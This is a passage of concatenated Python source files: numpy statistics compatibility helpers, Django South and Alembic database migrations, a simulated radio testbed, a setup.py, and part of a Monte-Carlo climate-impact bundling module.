    the unbiased (N-1) normalization that old MLab used.
    """
    # Use explicit np. names: the bare asarray/sqrt previously relied on
    # later star-imports in this module, making the function fragile to
    # import order.
    N = np.asarray(x).shape[axis]
    return _Nstd(x, axis) * np.sqrt(N / (N - 1.))

def mean(x, axis=0):
    """Arithmetic mean of *x* along *axis* (MLab default 0)."""
    return _Nmean(x, axis=axis)

# This is exactly the same cov function as in MLab
def cov(m, y=None, rowvar=0, bias=0):
    """Covariance matrix of observations in *m* (and optionally *y*).

    :param m: 2-d array of observations; rows are observations unless
        ``rowvar`` is true, in which case columns are observations.
    :param y: optional second data set; defaults to *m* itself.
    :param rowvar: if true, each row is a variable (transposes inputs).
    :param bias: if true, normalize by N instead of N-1.
    :raises ValueError: if m and y have different observation counts.
    """
    if y is None:
        y = m
    if rowvar:
        m = transpose(m)
        y = transpose(y)
    # A single row is treated as a column vector of observations.
    if (m.shape[0] == 1):
        m = transpose(m)
    if (y.shape[0] == 1):
        y = transpose(y)
    N = m.shape[0]
    if (y.shape[0] != N):
        raise ValueError("x and y must have the same number of observations")
    m = m - _Nmean(m, axis=0)
    y = y - _Nmean(y, axis=0)
    if bias:
        fact = N * 1.0
    else:
        fact = N - 1.0
    # Explicit np.dot/np.conjugate: the bare names previously relied on
    # later star-imports in this module.  (The redundant `else: y = y`
    # branch was also removed.)
    return squeeze(np.dot(transpose(m), np.conjugate(y)) / fact)

from numpy import sqrt, multiply
def corrcoef(x, y=None):
    """Correlation-coefficient matrix, derived from ``cov(x, y)``."""
    c = cov(x, y)
    variances = diag(c)
    return c / sqrt(multiply.outer(variances, variances))

# Package assembly: re-export everything from the compatibility submodules,
# record the numpy version, then drop the module names so only the
# re-exported symbols remain public.
from compat import *
from functions import *
from precision import *
from ufuncs import *
from misc import *

import compat
import precision
import functions
import misc
import ufuncs

import numpy
# Mirror numpy's version string for callers that check it here.
__version__ = numpy.__version__
del numpy

__all__ += ['__version__']
__all__ += compat.__all__
__all__ += precision.__all__
__all__ += functions.__all__
__all__ += ufuncs.__all__
__all__ += misc.__all__

# The submodule objects themselves are not part of the public API.
del compat
del functions
del precision
del ufuncs
del misc

# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):
    """South schema migration: adds the ``cms.ArticleComment`` model.

    Auto-generated; the ``models`` dict below is a frozen snapshot of the
    app's ORM state when the migration was created and must not be edited.
    """

    def forwards(self, orm):
        """Create the ``cms_articlecomment`` table."""
        # Adding model 'ArticleComment'
        db.create_table('cms_articlecomment', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('article', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['cms.Article'])),
            ('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
            ('author', self.gf('django.db.models.fields.CharField')(max_length=60)),
            ('comment', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal('cms', ['ArticleComment'])


    def backwards(self, orm):
        """Reverse of forwards: drop the ``cms_articlecomment`` table."""
        # Deleting model 'ArticleComment'
        db.delete_table('cms_articlecomment')


    # Frozen ORM state (auto-generated by South).
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'cms.article': {
            'Meta': {'ordering': "['title']", 'object_name': 'Article'},
            'allow_comments': ('django.db.models.fields.CharField', [], {'default': "'N'", 'max_length': '1'}),
            'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
            'content': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
            'conversions': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'created_at': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime.now'}),
            'header': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'keywords': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
            'sections': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['cms.Section']", 'null': 'True', 'through': "orm['cms.SectionItem']", 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '250', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
            'updated_at': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
            'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'cms.articlearchive': {
            'Meta': {'ordering': "('updated_at',)", 'object_name': 'ArticleArchive'},
            'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Article']"}),
            'content': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'header': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'cms.articlecomment': {
            'Meta': {'ordering': "('created_at',)", 'object_name': 'ArticleComment'},
            'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Article']"}),
            'author': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
            'comment': ('django.db.models.fields.TextField', [], {}),
            'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        },
        'cms.filedownload': {
            'Meta': {'object_name': 'FileDownload'},
            'count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
            'file': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['filer.File']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'uuid': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'})
        },
        'cms.menu': {
            'Meta': {'object_name': 'Menu'},
            'article': ('smart_selects.db_fields.ChainedForeignKey', [], {'default': 'None', 'to': "orm['cms.Article']", 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'link': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['cms.Menu']"}),
            u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'section': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Section']", 'null': 'True', 'blank': 'True'}),
            u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
        },
        'cms.section': {
            'Meta': {'ordering': "['title']", 'object_name': 'Section'},
            'articles': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['cms.Article']", 'null': 'True', 'through': "orm['cms.SectionItem']", 'blank': 'True'}),
            'conversions': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'header': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'keywords': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '250', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
            'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'cms.sectionitem': {
            'Meta': {'ordering': "['order']", 'object_name': 'SectionItem'},
            'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Article']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
            'section': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Section']"})
        },
        'cms.urlmigrate': {
            'Meta': {'object_name': 'URLMigrate'},
            'dtupdate': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'new_url': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
            'obs': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'old_url': ('django.db.models.fields.CharField', [], {'max_length': '250', 'db_index': 'True'}),
            'redirect_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
            'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'filer.file': {
            'Meta': {'object_name': 'File'},
            '_file_size': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'file': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'folder': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'all_files'", 'null': 'True', 'to': "orm['filer.Folder']"}),
            'has_all_mandatory_data': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
            'original_filename': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'owned_files'", 'null': 'True', 'to': "orm['auth.User']"}),
            'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polymorphic_filer.file_set'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
            'sha1': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '40', 'blank': 'True'}),
            'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
        },
        'filer.folder': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('parent', 'name'),)", 'object_name': 'Folder'},
            'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'filer_owned_folders'", 'null': 'True', 'to': "orm['auth.User']"}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['filer.Folder']"}),
            u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
        }
    }

    complete_apps = ['cms']
# Copyright (C) 2015 SensorLab, Jozef Stefan Institute http://sensorlab.ijs.si
#
# Written by Tomaz Solc, tomaz.solc@ijs.si
#
# This work has been partially funded by the European Community through the
# 7th Framework Programme project CREW (FP7-ICT-2009-258301).
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see http://www.gnu.org/licenses/

import logging
import Queue
import random
import time

from spectrumwars.testbed import TestbedBase, RadioBase, RadioTimeout, RadioError, TestbedError, RadioPacket

log = logging.getLogger(__name__)

class Radio(RadioBase):
	"""Simulated radio: packets travel through the testbed's dispatcher
	callback instead of real hardware, and arrive on an internal queue."""

	# Default number of seconds binrecv() waits for a packet.
	RECEIVE_TIMEOUT = 2.

	def __init__(self, addr, dispatcher, send_delay):
		super(Radio, self).__init__()
		self.addr = addr
		self.neighbor = None
		self.dispatcher = dispatcher
		self.q = Queue.Queue()
		self.frequency = 0
		self.bandwidth = 0
		self.send_delay = send_delay

	def _recv(self, addr, bindata, frequency, bandwidth):
		"""Called by the testbed: queue the packet only if it is addressed
		to this radio and matches its current channel configuration."""
		matches = (addr == self.addr
				and frequency == self.frequency
				and bandwidth == self.bandwidth)
		if matches:
			self.q.put(bindata)

	def set_configuration(self, frequency, bandwidth, power):
		"""Tune the radio; power is accepted but ignored by this simulation."""
		self.frequency = frequency
		self.bandwidth = bandwidth

	def binsend(self, bindata):
		"""Hand the packet to the dispatcher, then simulate air time."""
		self.dispatcher(self.neighbor, bindata, self.frequency, self.bandwidth)
		time.sleep(self.send_delay)

	def binrecv(self, timeout=None):
		"""Return the next queued packet, raising RadioTimeout if none
		arrives within the (default or given) timeout."""
		effective = self.RECEIVE_TIMEOUT if timeout is None else timeout
		try:
			return self.q.get(True, effective)
		except Queue.Empty:
			raise RadioTimeout

class Testbed(TestbedBase):
	"""In-process simulated testbed: Radio objects exchange packets through
	the shared _dispatcher callback instead of real hardware.

	send_delay: simulated transmission time per packet, in seconds.
	frequency_range / bandwidth_range / power_range: sizes of the discrete
	configuration spaces reported to players.
	packet_size: radios get PACKET_SIZE = packet_size + 1.
	"""

	RADIO_CLASS = Radio

	def __init__(self, send_delay=.1, frequency_range=64, bandwidth_range=10, power_range=10, packet_size=1024):
		self.send_delay = float(send_delay)
		self.frequency_range = int(frequency_range)
		self.bandwidth_range = int(bandwidth_range)
		self.power_range = int(power_range)

		self.RADIO_CLASS.PACKET_SIZE = int(packet_size) + 1

		self.radios = []

		# for each channel, we keep the timestamp of the last
		# transmission. we use this for simulated spectrum sensing and
		# for detecting collisions.
		self.channels = [0] * self.frequency_range

		# next radio address to hand out
		self.i = 0

	def _get_radio(self):
		"""Create a Radio with a fresh unique address and register it."""
		r = Radio(self.i, self._dispatcher, self.send_delay)
		self.radios.append(r)

		self.i += 1

		return r

	def _dispatcher(self, addr, bindata, frequency, bandwidth):
		"""Deliver a transmitted packet to all radios unless it collides
		with a recent transmission on the same channel."""
		now = self.time()

		# BUG FIX: this flag used to be named has_collision but was computed
		# with the opposite sense (True actually meant "channel free").
		# A collision happens when the previous transmission on this channel
		# was less than send_delay ago; delivery behavior is unchanged.
		collision = (now - self.channels[frequency]) <= self.send_delay
		self.channels[frequency] = now

		if collision:
			# note that when packets collide, the first one goes
			# through while the later ones fail. this is different
			# than in reality: all should fail. But this would
			# be complicated to implement in practice.
			log.debug("packet collision detected on channel %d" % (frequency,))
		else:
			for radio in self.radios:
				radio._recv(addr, bindata, frequency, bandwidth)

	def get_radio_pair(self):
		"""Return a (destination, source) pair of radios wired to each other."""
		dst = self._get_radio()
		src = self._get_radio()

		dst.neighbor = src.addr
		src.neighbor = dst.addr

		return dst, src

	def get_spectrum(self):
		"""Return simulated per-channel power readings: channels used in the
		last .5 s read hot (-40..-20), others near the noise floor (-90..-80)."""
		spectrum = []
		now = self.time()

		# BUG FIX: the loop variable used to be named "time", shadowing the
		# imported time module inside this method.
		for last_tx in self.channels:
			if now - last_tx < .5:
				p = random.randint(-40, -20)
			else:
				p = random.randint(-90, -80)

			spectrum.append(p)

		return tuple(spectrum)

	def get_frequency_range(self):
		return self.frequency_range

	def get_bandwidth_range(self):
		return self.bandwidth_range

	def get_power_range(self):
		return self.power_range

"""add graphql ACL to users

Revision ID: 2d4882d39dbb
Revises: dc2848563b53

"""

from alembic import op
import sqlalchemy as sa


# revision identifiers, used by Alembic.
revision = '2d4882d39dbb'
down_revision = 'dc2848563b53'

# Policy to extend, and the ACL templates this migration attaches to it.
POLICY_NAME = 'wazo_default_user_policy'
ACL_TEMPLATES = ['dird.graphql.me']

# Lightweight table constructs declaring only the columns this migration uses.
policy_table = sa.sql.table(
    'auth_policy', sa.Column('uuid', sa.String(38)), sa.Column('name', sa.String(80))
)
acl_template_table = sa.sql.table(
    'auth_acl_template', sa.Column('id', sa.Integer), sa.Column('template', sa.Text)
)
# Association table linking policies to ACL templates.
policy_template = sa.sql.table(
    'auth_policy_template',
    sa.Column('policy_uuid', sa.String(38)),
    sa.Column('template_id', sa.Integer),
)


def _find_acl_template(conn, acl_template):
    """Return the id of the ACL template row matching acl_template, or None."""
    condition = acl_template_table.c.template == acl_template
    lookup = sa.sql.select([acl_template_table.c.id]).where(condition).limit(1)
    return conn.execute(lookup).scalar()


def _find_acl_templates(conn, acl_templates):
    """Return the ids of the given templates that already exist in the
    database; templates with no matching row are silently skipped."""
    found = (_find_acl_template(conn, template) for template in acl_templates)
    return [template_id for template_id in found if template_id]


def _get_policy_uuid(conn, policy_name):
    """Return the uuid of the policy named policy_name, or None if absent."""
    policy_query = sa.sql.select([policy_table.c.uuid]).where(
        policy_table.c.name == policy_name
    )

    rows = conn.execute(policy_query).fetchall()
    if rows:
        return rows[0][0]
    return None


def _insert_acl_template(conn, acl_templates):
    """Ensure each template exists, inserting missing ones.

    Returns the ids of all templates, in input order.
    """
    ids = []
    for template in acl_templates:
        existing_id = _find_acl_template(conn, template)
        if existing_id:
            ids.append(existing_id)
            continue
        insert = (
            acl_template_table.insert()
            .returning(acl_template_table.c.id)
            .values(template=template)
        )
        ids.append(conn.execute(insert).scalar())
    return ids


def _get_acl_template_ids(conn, policy_uuid):
    """Return the template ids already associated with the given policy."""
    query = sa.sql.select([policy_template.c.template_id]).where(
        policy_template.c.policy_uuid == policy_uuid
    )
    rows = conn.execute(query).fetchall()
    return [row[0] for row in rows]


def upgrade():
    """Attach the graphql ACL templates to the default user policy.

    A no-op when the policy does not exist; associations already present
    are left untouched.
    """
    conn = op.get_bind()
    policy_uuid = _get_policy_uuid(conn, POLICY_NAME)
    if not policy_uuid:
        return

    wanted = set(_insert_acl_template(conn, ACL_TEMPLATES))
    current = set(_get_acl_template_ids(conn, policy_uuid))
    for template_id in wanted - current:
        conn.execute(
            policy_template.insert().values(
                policy_uuid=policy_uuid, template_id=template_id
            )
        )


def downgrade():
    """Remove the graphql ACL associations added by upgrade().

    The template rows themselves are kept; only the policy/template links
    are deleted. A no-op when either the templates or the policy is absent.
    """
    conn = op.get_bind()
    template_ids = _find_acl_templates(conn, ACL_TEMPLATES)
    if not template_ids:
        return

    policy_uuid = _get_policy_uuid(conn, POLICY_NAME)
    if not policy_uuid:
        return

    op.execute(
        policy_template.delete().where(
            sa.sql.and_(
                policy_template.c.policy_uuid == policy_uuid,
                policy_template.c.template_id.in_(template_ids),
            )
        )
    )

#
# Copyright (c) 2013 Christopher L. Felton
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

try:
    from setuptools import setup
    from setuptools import find_packages
except ImportError:
    # setuptools is unavailable: fall back to distutils and emulate
    # find_packages() with a pkgutil-based walk over the mn package.
    from distutils.core import setup
    from pkgutil import walk_packages

    import mn

    # many pypy installs don't have setuptools (?)
    def _find_packages(path='.', prefix=''):
        # Yield the prefix itself, then every sub-package found under path.
        yield prefix
        prefix = prefix + "."
        for _, name, ispkg in walk_packages(path, 
                                            prefix,
                                            onerror=lambda x: x):
            if ispkg:
                yield name
                
    def find_packages():
        # Drop-in, zero-argument replacement for setuptools.find_packages,
        # hard-wired to the "mn" package.
        return list(_find_packages(mn.__path__, mn.__name__))
    

# Package metadata. find_packages comes from setuptools when available,
# otherwise from the pkgutil-based fallback defined in the except branch above.
setup(name        = "minnesota",
      version     = "0.1pre",
      description = "collection of HDL cores ",
      license     = "LGPL",
      platforms   = ["Any"],
      keywords    = "DSP HDL MyHDL FPGA FX2 USB",

      packages    = find_packages(),
      # @todo need to add the examples and test directories,
      # copy it over ...
      )


# -*- coding: utf-8 -*-
################################################################################
# Copyright 2014, Distributed Meta-Analysis System
################################################################################

"""Software structure for generating Monte-Carlo collections of results.

NOTE: Highest resolution regions are implicitly assumed to be
FIPS-coded counties, but the logic does not require them to be.  FIPS
language should be replaced with generic ID references.

A key structure is the make_generator(fips, times, values) function.
make_generator is passed to the functions that iterate through
different weather forecasts, such as make_tar_ncdf.  It is then called
with each location and daily weather data.  fips is a single county
code, times is a list of yyyyddd formatted date values, values is a
list of weather values.

The output of make_generator() is a generator, producing tuples (year,
effect), for whichever years an effect can be computed.

Output file structure:

Each bundle of output impact results of a given type and for a given
weather forecast are in a gzipped tar file containing a single
directory <name>, containing a separate csv file (an effect file) for each
region.  The format of the csv file is:
  year,<label>[,<other labels>]*
  <year>,<impact>[,<prior calculated impact>]*

Basic processing logic:

Some functions, like find_ncdfs_allreal, discover collections of
forecasted variables (within the WDS directory structure), and provide
them through enumerators.  Variable collections are dictionaries {variable:
REFERENCE}, where REFERENCE may be a filename, a netCDF, or a
dictionary of {original: netCDF object, data: [days x counties],
times: [yyyyddd]}. [VRD]

Controllers (elsewhere) loop through these, and for each available
forecast call a make_tar_* function passing in a make_generator
function.  The make_tar_* functions call make_generator with each
individual region, retrieving a set of results, and then package those
results into the output file format.

Temporary directories (characterized by random letters) are used to
hold the results as they're being generated (before being bundled into
tars).
"""

__copyright__ = "Copyright 2014, Distributed Meta-Analysis System"

__author__ = "James Rising"
__credits__ = ["James Rising"]
__maintainer__ = "James Rising"
__email__ = "jar2234@columbia.edu"

__status__ = "Production"
__version__ = "$Revision$"
# $Source$

import tarfile, os, csv, re, random, string
import numpy as np
try:
    # this is required for nc4's, but we can wait to fail
    from netCDF4 import Dataset
except:
    pass

# Sentinel FIPS values. FIPS_COMPLETE is passed to make_generator after the
# last county so generators holding per-run state can release it (see
# send_fips_complete and load_tar_make_generator).
FIPS_COMPLETE = '__complete__' # special FIPS code for the last county
LATEX_STRING = '__latexstr__' # special FIPS code for making a LaTeX representation

### Effect Bundle Generation

## Temporary directory management

def enter_local_tempdir(prefix=''):
    """Create and set the working directory as a new temporary directory.

    prefix: optional string prepended to the random directory name.

    Returns the name of the temporary directory (to be passed to
    exit_local_tempdir).
    """

    # string.ascii_lowercase is locale-independent and exists on both
    # Python 2 and 3; string.lowercase was Python-2-only and locale-aware.
    suffix = ''.join(random.choice(string.ascii_lowercase) for i in range(6))

    os.mkdir(prefix + suffix)
    os.chdir(prefix + suffix)

    return prefix + suffix

def exit_local_tempdir(tempdir, killit=True):
    """Step back up to the root output directory and, unless killit is
    False, remove the temporary directory.

    tempdir is the output of enter_local_tempdir.
    """

    os.chdir("..")
    if not killit:
        return
    kill_local_tempdir(tempdir)

def kill_local_tempdir(tempdir):
    """Remove a temporary directory and all of its contents.

    Call after exit_local_tempdir is called, only if killit=False.
    """

    import shutil  # local import keeps this file's top-level imports untouched

    # shutil.rmtree replaces the previous os.system("rm -r ...") call:
    # portable, and immune to shell quoting problems on odd directory names.
    # ignore_errors=True preserves the old best-effort (never raise) behavior.
    shutil.rmtree(tempdir, ignore_errors=True)

## General helper functions for creation

def send_fips_complete(make_generator):
    """Call after the last county of a loop of counties, to clean up any memory.

    Invokes make_generator with the FIPS_COMPLETE sentinel so generators
    that hold per-run state (e.g. load_tar_make_generator's temporary
    directory) get a chance to release it.
    """

    print "Complete the FIPS"
    try:
        # .next() forces the generator body to actually start executing.
        iterator = make_generator(FIPS_COMPLETE, None, None).next()
        print "Success"
    except StopIteration, e:
        # Expected case: cleanup generators yield nothing for the sentinel.
        pass
    except Exception, e:
        # Best-effort cleanup: report the error but never propagate it.
        print e
        pass

def get_target_path(targetdir, name):
    """Join name onto targetdir when one is provided; otherwise use name
    as a path by itself."""

    if targetdir is None:
        return name
    return os.path.join(targetdir, name)

def write_effect_file(path, fips, generator, collabel):
    """Write the effects for a single FIPS-coded county.

    path: relative path for file
    fips: the unique id of the region
    generator: a enumerator of tuples/lists with individual rows
    collabel: label for one (string) or more (list) columns after the
    year column
    """

    # Header: "year" followed by one or more result-column labels.
    header = ["year"] + (collabel if isinstance(collabel, list) else [collabel])

    # 'wb' mode matches the Python 2 csv module's expectations.
    with open(os.path.join(path, fips + '.csv'), 'wb') as csvfp:
        writer = csv.writer(csvfp, quoting=csv.QUOTE_MINIMAL)
        writer.writerow(header)
        writer.writerows(generator)

## Top-level bundle creation functions

def make_tar_dummy(name, acradir, make_generator, targetdir=None, collabel="fraction"):
    """Constructs a tar of files for each county, using NO DATA.
    Calls make_generator for each county, using a filename of
    counties.

    name: the name of the effect bundle.
    acradir: path to the DMAS acra directory.
    make_generator(fips, times, daily): returns an iterator of (year, effect).
    targetdir: path to a final destination for the bundle
    collabel: the label for the effect column
    """

    tempdir = enter_local_tempdir()
    os.mkdir(name) # directory for county files

    # Generate a effect file for each county in regionsA
    with open(os.path.join(acradir, 'regions/regionsANSI.csv')) as countyfp:
        reader = csv.reader(countyfp)
        reader.next() # ignore header

        # Each row is a county
        for row in reader:
            # NOTE(review): canonical_fips is not defined in this module's
            # visible code -- presumably normalizes row[0] to a 5-digit FIPS
            # string (cf. make_tar_ncdf_profile) -- confirm where it comes from.
            fips = canonical_fips(row[0])
            print fips

            # Call generator (with no data)
            generator = make_generator(fips, None, None)
            if generator is None:
                continue

            # Construct the effect file
            write_effect_file(name, fips, generator, collabel)

    send_fips_complete(make_generator)

    # Generate the bundle tar (cwd is inside tempdir, so write to parent)
    target = get_target_path(targetdir, name)
    os.system("tar -czf " + os.path.join("..", target) + ".tar.gz " + name)

    # Remove the working directory
    exit_local_tempdir(tempdir)

def make_tar_duplicate(name, filepath, make_generator, targetdir=None, collabel="fraction"):
    """Constructs a tar of files for each county that is described in
    an existing bundle.  Passes NO DATA to make_generator.

    name: the name of the effect bundle.
    filepath: path to an existing effect bundle
    make_generator(fips, times, daily): returns an iterator of (year, effect).
    targetdir: path to a final destination for the bundle
    collabel: the label for the effect column
    """

    tempdir = enter_local_tempdir()
    os.mkdir(name)

    # Iterate through all FIPS-titled files in the effect bundle
    # (the first entry is assumed to be the bundle directory itself: skipped)
